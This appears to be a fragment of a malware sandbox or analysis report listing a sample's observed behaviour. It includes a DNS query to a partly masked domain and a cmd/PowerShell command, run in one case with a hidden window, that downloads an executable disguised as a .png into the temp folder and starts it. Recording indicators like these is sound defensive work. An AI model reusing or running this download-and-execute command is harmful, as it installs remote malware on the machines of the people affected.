Technical Information
- http://bb##rp.ca/2749936df41b73239c1c823642c0a82af74ab6.png as %temp%\ehpqj.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://bb##rp.ca/2749936df41b73239c1c823642c0a82af74ab6.png','%TMP%\Ehpqj.exe');Start-Process '%TMP%\Ehpqj.exe';
- DNS ASK bb##rp.ca
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://bb##rp.ca/2749936df41b73239c1c823642c0a82af74ab6.png','%TMP%\Ehpqj.exe');Start-Process '%TMP%\Ehpqj.exe';' (with hidden window)